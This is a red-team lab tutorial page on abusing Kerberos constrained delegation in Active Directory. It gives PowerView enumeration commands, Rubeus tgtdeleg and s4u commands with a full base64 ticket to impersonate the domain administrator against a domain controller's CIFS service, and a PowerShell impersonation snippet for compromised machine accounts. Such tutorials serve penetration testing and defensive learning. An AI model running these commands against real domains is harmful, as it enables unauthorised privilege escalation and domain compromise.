Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
From Domain Admin to Enterprise Admin
Kerberoasting
Kerberos: Golden Tickets
Kerberos: Silver Tickets
AS-REP Roasting
Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled
Kerberos Unconstrained Delegation
Kerberos Constrained Delegation
Kerberos Resource-based Constrained Delegation: Computer Object Takeover
Domain Compromise via DC Print Server and Kerberos Delegation
DCShadow - Becoming a Rogue Domain Controller
DCSync: Dump Password Hashes from Domain Controller
PowerView: Active Directory Enumeration
Abusing Active Directory ACLs/ACEs
Privileged Accounts and Token Privileges
From DnsAdmins to SYSTEM to Domain Compromise
Pass the Hash with Machine$ Accounts
BloodHound with Kali Linux: 101
Backdooring AdminSDHolder for Persistence
Active Directory Enumeration with AD Module without RSAT or Admin Privileges
Enumerating AD Object Permissions with dsacls
Active Directory Password Spraying
Active Directory Lab with Hyper-V and PowerShell
ADCS + PetitPotam NTLM Relay: Obtaining krbtgt Hash with Domain Controller Machine Certificate
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Kerberos Constrained Delegation
If you have compromised a user account or a computer (machine account) that has kerberos constrained delegation enabled, it's possible to impersonate any domain user (including administrator) and authenticate to a service that the user account is trusted to delegate to.

User Account

Prerequisites

Hunting for user accounts that have kerberos constrained delegation enabled:
[email protected]
1
Get-NetUser -TrustedToAuth
Copied!
In the below screenshot, the user spot is allowed to delegate or in other words, impersonate any user and authenticate to a file system service (CIFS) on a domain controller DC01.
User has to have an attribute TRUSTED_TO_AUTH_FOR_DELEGATION in order for it to be able to authenticate to the remote service.
TRUSTED_TO_AUTH_FOR_DELEGATION - (Windows 2000/Windows Server 2003) The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network.
​https://support.microsoft.com/en-gb/help/305144/how-to-use-useraccountcontrol-to-manipulate-user-account-properties​
Attribute msds-allowedtodelegateto identifies the SPNs of services the user spot is trusted to delegate to (impersonate other domain users) and authenticate to - in this case, it's saying that the user spot is allowed to authenticate to CIFS service on DC01 on behalf of any other domain user:
The msds-allowedtodelegate attribute in AD is defined here:
The TRUSTED_TO_AUTH_FOR_DELEGATION attribute in AD is defined here:

Execution

Assume we've compromised the user spot who has the constrained delegation set as described earlier. Let's check that currently we cannot access the file system of the DC01 before we impersonate a domain admin user:
[email protected]
1
dir \\dc01\c$
Copied!
Let's now request a delegation TGT for the user spot:
[email protected]
1
\\vboxsvr\tools\Rubeus\Rubeus.exe tgtdeleg
Copied!
Using rubeus, we can now request TGS for [email protected], who will be allowed to authenticate to CIFS/dc01.offense.local:
[email protected]
1
# ticket is the base64 ticket we get with `rubeus's tgtdeleg`
2
Rubeus.exe s4u /ticket:doIFCDCCBQSgAwIBBaEDAgEWooIEDjCCBAphggQGMIIEAqADAgEFoQ8bDU9GRkVOU0UuTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU9GRkVOU0UuTE9DQUyjggPEMIIDwKADAgESoQMCAQKiggOyBIIDro3ZCHDaVettnJseuyFJMK+Il4GAtWVAHPAq02cnHmOs3R2KcrOWpf3YbtnTD7fB+rKdZ8aElgloJO+v4XVM2NgyOVIia0MzNToDrK1ynhC70aApbag+ykvUFTDeG9NjhE3TVk3+F99vWboy6hhc9AmRUJwHFuqLC4djtL2PtQSpgWWL42W5eONlIZkc5XK0kWkC/AvivuuPOHs9aEy3g38hoBeApZE8NqT7mGKz5JHLwV5TyUgo87s6fFVSn8LHK8CI6G0x2DRhxxu04q0qnRXhLJ5S0MyJgJj6YDVESvCUgep5MXR+OYp0EGdVP8qQJK+x6m4rmr0Y3nd1Klmc+xDnLSC11ay7I8VevqhCBCZ64c+HQow4qcMTa/agxyOXqK42ynUl0GJtrLV7nIIrp+J2e5PECDUXIjKFkGnp6HZDNfzYAGL3XxyyT2JYdneOS3VUzJQyEctjuQMdVA0wB8NrRqDVdqSNBSOyBwpB3/FWzdHNYxztRmVT+Yz6qJCU4SYHIzHUE5dqHjvhjPSwgAkhS/QNApxtWvyba8iwCSnyualuhK46LS0pkt1IIQT0Y+qw80oL6mzjD+rxfKgR4B9hI6Imw9zTT5rjlRNMjWEy78izLtRB+ulzqdkZCUMA6zswWjq1BTmWzZX0LAZ+QAWQJPzoRVsqOcZCZwo/aWwmO1s9v5TLRRMLTAvk16PQW3z9NHix2Io9sObH8cb7gVrB+u2Q545Qwekl0uwP5mCar6swU2oEkxBm5DZvLsbZTcGl+KzGxqq/zhEJm3EceLuwIY81z8aYu13c6AsYETs9VevdEVysylpNL7EcHu8iXsoE5JmLx7OrcPR9WfeFWxRDp+1CVDijOI5VOS51+JpkEvcXFmfZueqLTJ66VGJgQaP7A3B//Y40ur5nSXyvEmIKgzdeqPLpGa5GPiNs/rYFmMlxwEX+yVFB5bPYgoszr3Crjsvs6Q/vdr36NoWqI9/11Nurzeeknt+k8sUV26URnQVkecW4yJFQ2TZwYCJ1k9h4cr96csJ9HhJO46UBye/8oqlqJXKnYY3JpaZiXWK77kG7BqhM6oPl+oEIbX2ycj/gHesxREvP7/vYINk33KbOSxXTAi3Je3wbZP7N+3B9Lz04m8Xi6nGeIVsZiMyODpnJVX5Bgq+3cGaSty0v+fIfqMHDwuKhOS7h1MGLJduhWh3b21ytDfzn73yyCPskFee2ckAomlAgxMzg8ZatmZDLTxfUenJ+EnrJgkYee6OB5TCB4qADAgEAooHaBIHXfYHUMIHRoIHOMIHLMIHIoCswKaADAgESoSIEIN2JDvcjQZeMR+7giMsawE1vG/Cmw9IFIV7ZYwaELMqaoQ8bDU9GRkVOU0UuTE9DQUyiETAPoAMCAQGhCDAGGwRzcG90owcDBQBgoQAApREYDzIwMTkwODE3MTMyMDU2WqYRGA8yMDE5MDgxNzIzMDY0MFqnERgPMjAxOTA4MjQxMzA2NDBaqA8bDU9GRkVOU0UuTE9DQUypIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU9GRkVOU0UuTE9DQUw= /impersonateuser:administrator /domain:offense.local /msdsspn:cifs/dc01.offense.local /dc:dc01.offense.local /ptt
Copied!
We've got the impersonated TGS tickets for administrator account:
Which as we can see are now in memory of the current logon session:
[email protected]
1
klist
Copied!
If we now attempt accessing the file system of the DC01 from the user's spot terminal, we can confirm we've successfully impersonated the domain administrator account that can authenticate to the CIFS service on the domain controller DC01:
[email protected]
1
dir \\dc01.offense.local\c$
Copied!
Note that in this case we requested a TGS for the CIFS service, but we could also request additional TGS tickets with rubeus's /altservice switch for: HTTP (WinRM), LDAP (DCSync), HOST (PsExec shell), MSSQLSvc (DB admin rights).

Computer Account

If you have compromised a machine account or in other words you have a SYSTEM level privileges on a machine that is configured with constrained delegation, you can assume any identity in the AD domain and authenticate to services that the compromised machine is trusted to delegate to.
In this lab, a workstation WS02 is trusted to delegate to DC01 for CIFS and LDAP services and I am going to exploit the CIFS services this time:
Using powerview, we can find target computers like so:
[email protected]
1
Get-NetComputer ws02 | select name, msds-allowedtodelegateto, useraccountcontrol | fl
2
Get-NetComputer ws02 | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
Copied!
Let's check that we're currently running as SYSTEM and can't access the C$ on our domain controller DC01:
[email protected]
1
hostname
2
[System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
3
ls \\dc01.offense.local\c$
Copied!
Let's now impersonate [email protected] and try again:
[email protected]
1
[Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
2
$idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
3
$idToImpersonate.Impersonate()
4
[System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
5
​
6
ls \\dc01.offense.local\c$
Copied!

References

S4U2Pwnage - harmj0y
harmj0y
The Most Dangerous User Right You (Probably) Have Never Heard Of - harmj0y
harmj0y
Delegation tab in ADUC not available until a SPN is set
docsmsft
KDC_ERR_BADOPTION when attempting constrained delegation
docsmsft
UserAccountControl property flags - Windows Server
docsmsft
Previous
Kerberos Unconstrained Delegation
Next
Kerberos Resource-based Constrained Delegation: Computer Object Takeover
Last modified 2yr ago
Copy link
Contents
User Account
Prerequisites
Execution
Computer Account
References